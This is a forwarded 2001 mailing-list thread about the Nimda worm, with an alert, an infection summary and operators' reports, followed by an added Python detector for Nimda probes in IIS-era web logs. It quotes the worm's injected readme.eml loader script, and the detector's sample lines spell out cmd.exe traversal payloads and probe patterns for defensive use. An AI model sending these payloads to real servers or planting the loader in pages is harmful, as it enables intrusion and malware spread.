Here's one from a thread on nanog

HTH,

Geoff

----- Original Message -----
From: "Jim Olsen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes


>
> This is the information I've collected thus far on W32.nimda:
>
> W32.nimda is NOT a Code Red variant, and the people who are referring to it as
> "Code Blue" were mistaken...
>
> The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses
> several vulnerabilities in Windows NT and 2000 servers to infect a server,
> and also employs email and web site mobile code to infect Windows
> 9x/ME/NT/2k boxes.
>
> During the initial infection of a server, the worm does the following:
>         - downloads a file named "admin.dll" via tftp from the system that is
>           trying to infect the target
>         - adds the guest account to the local administrators group and
>           activates the account
>         - makes sure c$ is shared out
>         - copies itself to c, d, and e drives
>         - tries to mail itself to email addresses that it discovers on the
>           server
>         - creates a file named readme.exe, which is used in the mobile code
>           inserted on the web sites below
>         - adds this string to the web pages found on the server:
> <html><script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script></html>
>         - scans for and infects other vulnerable IIS servers
>         - goes through all shared directories and puts sample.nws,
>           sample.eml, desktop.eml, desktop.nws in each directory. These are eml
>           messages with copies of itself (readme.exe) autoloaded by the mobile html
>           code mentioned above.
>         - goes through all shared directories and puts riched20.dll in each
>           directory, which is a trojan dll version of W32.nimda that is meant to
>           infect people running notepad/wordpad in that directory.
>         - puts a trojan mmc.exe in the winnt directory that is a copy of
>           itself in the above "readme.exe" format (win2000 only)
>
> If a user views a web site that is hosted on an infected server, the
> following happens:
>         - upon viewing an infected page, the mobile code extracts to
>           readme.exe and starts in Windows Media Player (without user intervention)
>         - the user's machine becomes infected with W32.nimda at this point
>           in time
>         - the worm starts scanning for other vulnerable IIS servers
>         - the worm emails itself to everyone in the user's address book
>         - goes through all shared directories and puts sample.nws,
>           sample.eml, desktop.eml, desktop.nws in each directory. These are eml
>           messages with copies of itself (readme.exe) autoloaded by the mobile html
>           code mentioned above.
>         - goes through all shared directories and puts riched20.dll in each
>           directory, which is a trojan dll version of W32.nimda that is meant to
>           infect people running notepad/wordpad in that directory.
>         - puts a trojan mmc.exe in the winnt directory that is a copy of
>           itself in the above "readme.exe" format (win2000 only)
>
> It is unknown to me what happens (at this point in time) if a user opens an
> attachment that is sent from an infected site. It is possible that it could
> automatically infect the user's computer using the same methods mentioned
> above.
>
> EVERYONE who uses Internet Explorer to browse the internet should probably do
> one of two things to stop from being automatically infected by W32.nimda (I
> have not tested whether or not turning off JavaScript fixes the problem):
>         o) don't browse web pages until Microsoft releases a patch
>         o) turn OFF JavaScript
>
> EVERYONE who uses Outlook/Outlook Express should, at the very least, not open
> any attachments that they are not expecting. Turning off auto-preview might
> be a good idea as well.
>
> Slashdot has an article discussing this:
> http://slashdot.org/articles/01/09/18/151203.shtml
>
> On Tuesday 18 September 2001 11:33, Braun, Mike wrote:
> > I received this warning from TruSecure regarding the latest worm attack.
> >
> > Mike Braun
> > First American CREDCO
> >
> > -----Original Message-----
> > TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
> >
> > Date: September 18, 2001
> > Time:  1000 EDT
> >
> > RISK INDICES:
> >
> > Initial Assessment: RED HOT
> >
> > Threat: VERY HIGH, (rapidly increasing)
> >
> > Vulnerability Prevalence: VERY HIGH, affects IIS servers version 4.0,
> > 5.0, and internal networks.
> >
> > Cost: High, command execution is possible
> >
> > Vulnerable Systems:  IIS 4.0 and 5.0
> >
> > SUMMARY:
> > A new IIS worm is spreading rapidly.  Its working name is Nimda:
> > W32.nimda.a.mm
> >
> > It started about 9am eastern time today, Tuesday, September 18, 2001.
> > Multiple sensors world-wide run by TruSecure corporation are getting
> > multiple hundred hits per hour. It began at 9:08 am.
> >
> > The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
> > multiple vulnerabilities including:
> >
> > Almost all are get scripts, and a get msadc (cmd.exe)
> > get_mem_bin
> > vti_bin  owssvr.dll
> > Root.exe
> > CMD.EXE
> > ../  (Unicode)
> > Getadmin.dll
> > Default.IDA
> > /Msoffice/  cltreq.asp
> >
> > This is not Code Red or a Code Red variant.
> >
> > The worm, like Code Red, attempts to infect its local subnet first,
> > then spreads beyond the local address space.
> >
> > It is spreading very rapidly.
> >
> > TruSecure believes that this worm will infect any IIS 4 and IIS 5
> > box with well known vulnerabilities.  We believe that there are
> > nearly 1 million such machines currently exposed to the Internet.
> >
> > Risks Indices:
> > Vulnerability   VULNERABILITY  PREVALENCE is very high - Millions of
> > Internet Web server hosts:   TruSecure process and essential
> > configurations should generally be protective.  The vulnerability
> > prevalence world-wide is very high
> >
> > Threat - VERY HIGH and Growing The rate of growth and spread is
> > exceedingly rapid - significantly faster than any worm to date and
> > significantly faster than any variant of Code red.
> >
> > Cost --  Unknown, probably moderate per infected system.
> >
> >
> > The worm itself is a file called
> > README.EXE, or ADMIN.DLL,
> > a 56K file which is advertised as an audio xwave MIME type file.
> >
> > Other RISKS:
> > There is risk of DoS of network segments by traffic volume alone
> > There is large risk of successful attack to both Internet exposed IIS
> > boxes and to developer and Intranet boxes inside of corporations.
> >
> > Judging by the Code Red II experience, we expect many subtle routes
> > of infection leading to inside corporate infections.
> >
> > We cannot discount the coincidence of the date and time of release,
> > exactly one week (probably to the minute) after the World Trade
> > Center attack.
> >
> >
> > REPLICATION:
> > There are at least three mechanisms of spread:
> > The worm seems to spread by direct IIS attack across the Internet (IP
> > spread)
> > It probably also spreads by local shares.  (this is not known for
> > sure at this time)
> > There is also an email vector where README.EXE is sent via email to
> > numerous accounts.
> >
> > Mitigations
> > TruSecure essential practices should work.
> > Block all email with EXE attachments
> > Filter for README.EXE
> > Make sure IIS boxes are well patched and hardened, or removed from
> > both the Internet and Intranets.
> > Make sure any developer computing platforms are not running IIS of
> > any version (many do so by default if either.
> > Disconnect mail from the Internet
> > Advise users not to double click on any unexpected attachments.
> > Update anti-virus when your vendor has the signature.
> >
> >
> > -----Original Message-----
> > From: Bryan Heitman [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 8:22 AM
> > To: [EMAIL PROTECTED]
> > Subject: Re: Worm probes
> >
> >
> >
> > We're also seeing a large increase in this activity.  This seems to be more
> > severe than the first time.  Have an additional 30 to 40 meg inbound from
> > this.
> >
> > Best regards,
> >
> >
> > Bryan Heitman
> > CommuniTech.Net, Inc.
> > ----- Original Message -----
> > From: <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 10:05 AM
> > Subject: Re: Worm probes
> >
> > > ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k
> > > box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this
> > > time of day, although still well short of capacity...apache server
> > > processor load is WAY up just from the requests, and the logs are growing
> > > like mad.
> > >
> > > On Tue, 18 Sep 2001, deeann mikula wrote:
> > > > On Tue, 18 Sep 2001, ravi pina wrote:
> > > > > On Tue, Sep 18, 2001 at 09:54:31AM -0400, [EMAIL PROTECTED] said at one
> > > > > point in time:
> > > > > > Has anyone else been seeing a dramatic increase in /scripts/.. NT
> > > > > > worm probes this morning?  We're seeing about 8000/second, starting
> > > > > > around 9:15 Eastern time, to and from a wide variety of addresses.
> > > > >
> > > > > affirmative.  i just looked at my logs, and it looks like
> > > > > each probe tries a bunch of things.  i haven't seen much
> > > > > on the lists, but i'm looking right now.
> > > >
> > > > I'm pretty sure that the worm's attack phase starts on the 20th (which
> > > > of course, depends upon a correctly set system clock) and also that
> > > > attempting to execute something like /scripts/root.ext/c++ something
> > > > is involved.
> > > >
> > > > I think that CERT's website would be a good place to look.  I'm *not*
> > > > a security/virus chick, but I did host a talk by Marty Linder of CERT
> > > > where he dissected Code Red's activity and presented a summary.
> > > >
> > > > cert is of course, http://www.cert.org.
> > > >
> > > >
> > > > deeann m.m. mikula
> > > >
> > > > director of operations
> > > > telerama public access internet
> > > > http://www.telerama.com
> > > > 1.877.688.3200
> > >
> > > James Smallacombe       PlantageNet, Inc. CEO and Janitor
> > > [EMAIL PROTECTED]     http://3.am
> > >
>
> --
> "Computer games don't affect kids, I mean if Pacman affected us as kids,
> we'd all be running around in darkened rooms, munching pills, and
listening
> to repetitive music." ~unknown
> ****
> Jim Olsen
> Systems Administrator
> CyberJunkees
> ****
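The probes the thread describes (root.exe, cmd.exe, MSADC, _mem_bin, _vti_bin/owssvr.dll, default.ida, the Unicode "../" traversal, admin.dll) and the readme.eml loader the worm appends to served pages are both things an operator can check for from the server side. The following is an added example, written for this page and not code from any of the posters or from TruSecure: it canonicalizes request paths the way the vulnerable IIS did, flags the probe patterns in constructed Apache-format log lines, groups hits by source host, and tests page content for the injected window.open("readme.eml") script. The sample log lines are constructed, not real traffic, and the specific overlong UTF-8 sequences mapped in decode_path() are the well-known IIS Unicode traversal encodings, which is an assumption on my part rather than something the thread lists.

```python
"""Flag Nimda-style IIS probes in web server access logs and detect the
readme.eml loader the worm appends to served pages.

Added example, not code from the thread.  Log lines are constructed in
Apache combined format (the Apache admins in the thread saw the probes in
their logs).  The overlong UTF-8 sequences in OVERLONG are an assumption:
they are the classic IIS Unicode traversal encodings, not listed on the page.
"""
import re
from urllib.parse import unquote

# Overlong UTF-8 encodings of '/' and '\' that the IIS Unicode bug accepted.
# Python's unquote() turns these into U+FFFD, so map them before decoding.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\", "%c1%1c": "\\"}

# (label, regex applied to the fully decoded, forward-slash-normalized path)
NIMDA_PROBES = [
    ("root.exe backdoor",       re.compile(r"/root\.exe", re.I)),
    ("cmd.exe via traversal",   re.compile(r"\.\./.*winnt/system32/cmd\.exe", re.I)),
    ("cmd.exe via drive share", re.compile(r"^/[a-z]/winnt/system32/cmd\.exe", re.I)),
    ("MSADC",                   re.compile(r"^/msadc/", re.I)),
    ("_mem_bin",                re.compile(r"^/_mem_bin/", re.I)),
    ("_vti_bin owssvr.dll",     re.compile(r"^/_vti_bin/.*owssvr\.dll", re.I)),
    ("default.ida",             re.compile(r"/default\.ida", re.I)),
    ("admin.dll drop",          re.compile(r"/admin\.dll", re.I)),
]

# Apache combined log format; only the request field matters here.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# The loader string quoted in the thread; quote style and whitespace may vary.
INJECTED_LOADER = re.compile(
    r"<script[^>]*>\s*window\.open\(\s*['\"]readme\.eml['\"]", re.I | re.S
)


def decode_path(target: str) -> str:
    """Canonicalize a request target the way the vulnerable IIS did:
    map overlong UTF-8 to ASCII, percent-decode twice (catches %255c), and
    treat backslash as a path separator.  The query string is dropped."""
    path = target.split("?", 1)[0].lower()
    for seq, ch in OVERLONG.items():
        path = path.replace(seq, ch)
    # two passes: "%255c" -> "%5c" -> "\" ; a no-op on already-clean paths
    decoded = unquote(unquote(path, errors="replace"), errors="replace")
    return decoded.replace("\\", "/")


def classify_request(line: str):
    """Return (client, decoded_path, [probe labels]), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m.group("target"))
    hits = [label for label, rx in NIMDA_PROBES if rx.search(path)]
    return m.group("host"), path, hits


def scan_log(lines):
    """Group probe hits by client so scanning hosts can be blocked or reported."""
    by_host = {}
    for line in lines:
        parsed = classify_request(line)
        if parsed is None:
            continue
        host, path, hits = parsed
        if hits:
            by_host.setdefault(host, []).append((path, hits))
    return by_host


def page_is_infected(html: str) -> bool:
    """True if served HTML carries the readme.eml loader the worm appends."""
    return INJECTED_LOADER.search(html) is not None


# Constructed sample log lines (not real traffic); 192.0.2.10 is the scanner.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Sep/2001:09:15:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:09:15:02 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:09:15:03 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:09:15:03 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:09:15:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:09:15:04 -0400] "GET /_vti_bin/owssvr.dll?UL=1 HTTP/1.0" 404 -',
    '198.51.100.7 - - [18/Sep/2001:09:15:05 -0400] "GET /index.html HTTP/1.1" 200 1532',
]

if __name__ == "__main__":
    for host, probes in scan_log(SAMPLE_LOG).items():
        print(f"{host}: {len(probes)} probe(s)")
        for path, hits in probes:
            print(f"  {path}  <- {', '.join(hits)}")
    infected = ('<html><script language="JavaScript">window.open("readme.eml", null,'
                ' "resizable=no,top=6000,left=6000")</script></html>')
    print("page infected:", page_is_infected(infected))
```

Matching on the decoded path rather than the raw request line is the point: the same cmd.exe traversal arrives as %255c, %c0%af, %c1%9c and several other spellings, and a filter keyed on the literal strings misses most of them. A 404 on every probe, as in the constructed lines, is the healthy case; a 200 on a cmd.exe or root.exe request is the one to page someone about.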


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
